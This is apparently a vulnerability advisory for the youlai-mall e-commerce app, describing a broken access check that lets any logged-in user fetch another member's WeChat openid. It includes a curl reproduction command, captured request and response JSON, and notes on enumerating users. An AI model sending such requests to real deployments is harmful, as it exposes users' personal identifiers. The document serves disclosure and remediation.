The youlai-mall application has an improper access control vulnerability that allows unauthorized users to retrieve other users’ WeChat openid by manipulating the memberId parameter.

[Hwwg]

Contributors: Huang Weigang

1. Vulnerability Impact

youlai-mall (latest)
https://github.com/youlaitech/youlai-mall

2. Vulnerability Location

• memberId: GET /mall-ums/app-api/v1/members/{memberId}/openid

3. Code Analysis

First, the API accepts memberId as the parameter.

Furthermore, in the subsequent implementation code the system directly uses id to query user‘s data, but there is no check to verify that this data belongs to the currently logged-in user.

Vulnerability Reproduction

• Preconditions: Attacker has a valid App login token; the target user’s memberId is known or guessable.
• Target endpoint: GET /mall-ums/app-api/v1/members/{memberId}/openid
• Steps:
• Log in as User A and obtain a valid Authorization: Bearer .
• Send a request using User B’s memberId :
  • curl -H "Authorization: Bearer " https:///mall-ums/app-api/v1/members/12345/openid
• Observe a 200 OK response containing User B’s openid , for example:
  • {"code":200,"data":"oUBUG5hAB_8EMrSaqd2HjJQBFg74","msg":"success"}
• Code reference: The controller method directly queries by memberId and returns openid without verifying ownership (no memberId == SecurityUtils.getMemberId() check).

"data": {
"request_data": {
"method": "GET",
"url": "http://10.15.196.160:9999/mall-ums/app-api/v1/members/1/openid",
"json": {},
"params": {},
"data": {},
"files": {}
},
"response_data": {
"code": "00000",
"data": "oUBUG5hAB_8EMrSaqd2HjJQBFg74",
"msg": "一切ok"
}
},
USER-B
"test": {
"request_data": {
"method": "GET",
"url": "http://10.15.196.160:9999/mall-ums/app-api/v1/members/1/openid",
"json": {},
"params": {},
"data": {},
"files": {}
},
"response_data": {
"code": "00000",
"data": "oUBUG5hAB_8EMrSaqd2HjJQBFg74",
"msg": "一切ok"
}
}
}

4. Impact Description

• Sensitive identifier leakage: Exposes a user’s openid , the unique WeChat identifier for the mini-app, to unauthorized parties.
• Enumeration and profiling: Combined with GET /app-api/v1/members/openid/{openid} (returns MemberAuthDTO with id/username/status ), enables account enumeration and user profiling.
• Expanded attack surface: If memberId values are predictable or enumerable, attackers can build a system-wide memberId → openid mapping, facilitating social engineering and targeted abuse.
• Access control failure: Missing resource ownership validation violates least privilege and data boundary principles.
• Compliance risk: Unauthorized disclosure of personal identifiers can trigger privacy and regulatory noncompliance concerns.